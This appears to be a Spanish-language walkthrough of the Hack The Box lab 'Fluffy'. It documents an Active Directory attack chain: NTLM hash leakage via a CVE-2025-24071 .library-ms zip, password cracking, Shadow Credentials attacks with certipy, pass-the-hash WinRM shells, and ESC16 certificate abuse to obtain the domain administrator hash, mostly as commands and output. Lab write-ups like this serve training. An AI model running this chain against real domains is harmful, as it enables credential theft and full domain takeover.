Fluffy inicia con la enumeracion de recursos SMB para acceder a un PDF que documenta vulnerabilidades del sistema. Una de ellas permitio filtrar un hash NTLM a traves de un archivo .library-ms comprimido. El analisis con Bloodhound muestra permisos GenericAll y GenericWrite para un usuario, lo que permitio realizar Shadow Credentials attack a multiples usuarios para acceso por WinRM. Finalmente se identifico y exploto una plantilla vulnerable ESC16 para escalar privilegios.
# Nmap 7.95 scan initiated Sun May 25 03:05:51 2025 as: /usr/lib/nmap/nmap --privileged -p53,139,389,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49681,49698,49706,49739 -sV -sC -oN nmap_scan 10.10.11.69Nmap scan report for 10.10.11.69
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)| fingerprint-strings:
| DNS-SD-TCP:
| _services
| _dns-sd
| _udp
|_ local139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49739/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=5/25%Time=6832C165%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-25T14:09:26
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h02m34s, deviation: 0s, median: 7h02m34s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 25 03:07:28 2025 -- 1 IP address (1 host up) scanned in 97.38 seconds
Agregamos a nuestro archivo /etc/hosts los valores fluffy.htbdc01.fluffy.htb.
Service Access
Las credenciales tienen acceso por los servicio smb y ldap.
❯ ~/htb/tools/bloodhound-ce/bloodhound.py -u j.fleischman -p 'J0elTHEM4n1990!' -ns 10.10.11.69 -d fluffy.htb -c All --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 15S
INFO: Compressing output into 20250525110540_bloodhound.zip
❯
Creamos un wordlist basado en la lista de usuarios de bloodhound.
❯ exiftool Upgrade_Notice.pdf
ExifTool Version Number : 13.25
File Name : Upgrade_Notice.pdf
Directory : .
File Size : 170 kB
File Modification Date/Time : 2025:05:25 03:39:24-04:00
File Access Date/Time : 2025:05:29 02:57:05-04:00
File Inode Change Date/Time : 2025:05:25 03:39:24-04:00
File Permissions : -rw-rw-r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 2Tagged PDF : Yes
Language : en
Title : Upgrade Notice For IT Department
Create Date : 2025:05:17 07:22:32+00:00
Modify Date : 2025:05:17 07:22:32+00:00
Keywords : DAGnmrYlJoI, BAF-XVRpOno, 0Author : p.agila
❯
Ademas, el contenido muestra una lista de Vulnerabilidades que deben de ser parcheadas.
Se explica el CVE-2025-24071 que, es posible filtrar el Hash NTLM a traves de un archivo .library-ms conteniendo la direccion de un servidor SMB (\\10.10.10.10\share\) comprimido en un archivo rar/zip.
El archivo .library-ms tiene una estructura XML, tras ser parseado por el servicio de indexacion de Windows Explorer se logra el ataque.
❯ git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
Cloning into 'CVE-2025-24071_PoC'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18(delta 4), reused 0(delta 0), pack-reused 0(from 0)Receiving objects: 100% (18/18), 6.30 KiB | 6.30 MiB/s, done.
Resolving deltas: 100% (4/4), done.
❯ cd CVE-2025-24071_PoC
❯ ll
.rw-rw-r-- kali kali 1003 B Thu May 29 03:12:56 2025 poc.py
.rw-rw-r-- kali kali 966 B Thu May 29 03:12:56 2025 README.md
❯
Ejecutamos, especificando el nombre de archivo y direccion IP.
1
2
3
4
5
6
7
8
9
10
❯ python poc.py
Enter your file name: sckull
Enter IP (EX: 192.168.1.162): 10.10.14.58
completed
❯
❯ ll
.rw-rw-r-- kali kali 320 B Thu May 29 03:14:15 2025 exploit.zip
.rw-rw-r-- kali kali 1003 B Thu May 29 03:12:56 2025 poc.py
.rw-rw-r-- kali kali 966 B Thu May 29 03:12:56 2025 README.md
❯
Ejecutamos john con el wordlist rockyou.txt sobre el archivo de hash de responder para la direccion 10.10.11.69 logrando obtener su valor en texto plano.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ john SMB-NTLMv2-SSP-10.10.11.69.txt --wordlist=$ROCKUsing default input encoding: UTF-8
Loaded 21 password hashes with 21 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)prometheusx-303 (p.agila)prometheusx-303 (p.agila)prometheusx-303 (p.agila)prometheusx-303 (p.agila)prometheusx-303 (p.agila)prometheusx-303 (p.agila)21g 0:00:00:23 DONE (2025-05-25 11:54) 0.8947g/s 192496p/s 4042Kc/s 4042KC/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
❯
User - a.gila
Las credenciales nos permite el acceso por smb y ldap.
Uno de los usuarios de interes es ca_svc, ya que con este podriamos ejecutar Certipy y verificar plantillas vulnerables.
GenericAll -> Service Accounts
Agregamos a p.agila al grupo Service Accounts.
1
2
3
# add p.agila to service accountspth-net rpc group addmem "Service Accounts" p.agila -U "fluffy.htb/p.agila%prometheusx-303" -S 10.10.11.69
net rpc group members "Service Accounts" -U "fluffy.htb/p.agila%prometheusx-303" -S 10.10.11.69
Shadow Credentials
Con el permiso de GenericWrite podemos obtener el hash del usuario realizado Shadow Credentials Attack mediante certipy. Ejecutamos este ataque para los tres usuarios dentro del grupo Service Accounts iniciando con el usuario ca_svc.
# GenericWrite on ca_svc, ldap_svc, winrm_svc❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account ca_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'ca_svc'[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8'[*] Adding Key Credential with device ID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8' to the Key Credentials for'ca_svc'[*] Successfully added Key Credential with device ID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8' to the Key Credentials for'ca_svc'[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'[*] Wrote credential cache to 'ca_svc.ccache'[*] Trying to retrieve NT hashfor'ca_svc'[*] Restoring the old Key Credentials for'ca_svc'[*] Successfully restored the old Key Credentials for'ca_svc'[*] NT hashfor'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
❯
Obtuvmios de la misma forma para el usuario ldap_svc.
❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account ldap_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'ldap_svc'[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca'[*] Adding Key Credential with device ID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca' to the Key Credentials for'ldap_svc'[*] Successfully added Key Credential with device ID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca' to the Key Credentials for'ldap_svc'[*] Authenticating as 'ldap_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ldap_svc@fluffy.htb'[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ldap_svc.ccache'[*] Wrote credential cache to 'ldap_svc.ccache'[*] Trying to retrieve NT hashfor'ldap_svc'[*] Restoring the old Key Credentials for'ldap_svc'[*] Successfully restored the old Key Credentials for'ldap_svc'[*] NT hashfor'ldap_svc': 22151d74ba3de931a352cba1f9393a37
❯
❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account winrm_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'winrm_svc'[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '8e224404-6043-2547-3758-c02d8e2ae20f'[*] Adding Key Credential with device ID '8e224404-6043-2547-3758-c02d8e2ae20f' to the Key Credentials for'winrm_svc'[*] Successfully added Key Credential with device ID '8e224404-6043-2547-3758-c02d8e2ae20f' to the Key Credentials for'winrm_svc'[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'[*] Wrote credential cache to 'winrm_svc.ccache'[*] Trying to retrieve NT hashfor'winrm_svc'[*] Restoring the old Key Credentials for'winrm_svc'[*] Successfully restored the old Key Credentials for'winrm_svc'[*] NT hashfor'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
❯
User - winrm_svc
winrm_svc puede acceder por el servicio WinRM, utilizamos el hash con evil-winrm logrando acceder a la maquina y la flag user.txt.
❯ evil-winrm -i fluffy.htb -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc'for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> dir ../Desktop
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/25/2025 8:18 AM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cat ../Desktop/user.txt
14a51cbc5bfc0388a9179b991f265390
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
Privesc
Utilizando el hash de ca_svc ejecutamos certipy especificando la busqueda de plantillas vulnerables. Se muestra que el Ceritficate Authority es vulnerable a ESC16.
❯ certipy-ad find -vulnerable -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -no-pass -dc-ip 10.10.11.69 -ns 10.10.11.69 -target dc01.fluffy.htb -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for'fluffy-DC01-CA'[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0 CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
❯
ESC16 Exploit
Realizamos la explotacion de ESC16 iniciando con la verificacion de los requisitos. Se menciona que la cuenta atacante debe de tener permisos GenericWrite sobre la victima, esta ultima debe de tener acceso a cualquier plantilla del CA vulnerable. Esto se cumple ya que winrm_svc o ldap_svc tienen permisos sobre ca_svc quien es el que tiene acceso a la plantilla vulnerable.
Iniciamos la explotacion realizando el cambio del UPN del usuario ca_svc a administrator con las credenciales de winrm_svc.
Con lo anterior solicitamos un certificado de la plantilla User con ca_svc.
1
2
3
4
5
6
7
8
9
10
11
12
❯ certipy-ad req -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip '10.10.11.69' -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'Certipy v5.0.2 - by Oliver Lyak (ly4k)[*] Requesting certificate via RPC
[*] Request ID is 19[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'[*] Wrote certificate and private key to 'administrator.pfx'❯
Actualizamos nuevamente el UPN del usuario ca_svc a su valor original.
Finalmente utilizamos el certificado solicitado para autenticacion logrando obtener el hash de administrator.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'Certipy v5.0.2 - by Oliver Lyak (ly4k)[*] Certificate identities:
[*] SAN UPN: 'administrator'[*] Using principal: 'administrator@fluffy.htb'[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'[*] Wrote credential cache to 'administrator.ccache'[*] Trying to retrieve NT hashfor'administrator'[*] Got hashfor'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
❯ Wrote certificate and private key to 'administrator.pfx'❯
Lista de comandos del ataque a ESC16.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# check upn of victim user GenericWritecertipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -user 'ca_svc'read# update upn of the victimcertipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
# request certificate as the victim to any template on the CA vulnerablecertipy-ad req -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip '10.10.11.69' -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'# revert upn of the victimcertipy-ad account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
# authenticate as the victim with the requested templatecertipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Shell
Utilizamos el hash de administrator por WinRM logrando obtener una shell y la flag root.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ evil-winrm -i fluffy.htb -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc'for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
fluffy\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
d7c989c36f239695ee0649aa6c6e49d2
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Dump Hashes
Realizamos un dump de las hashes con impacket-secretdumps.
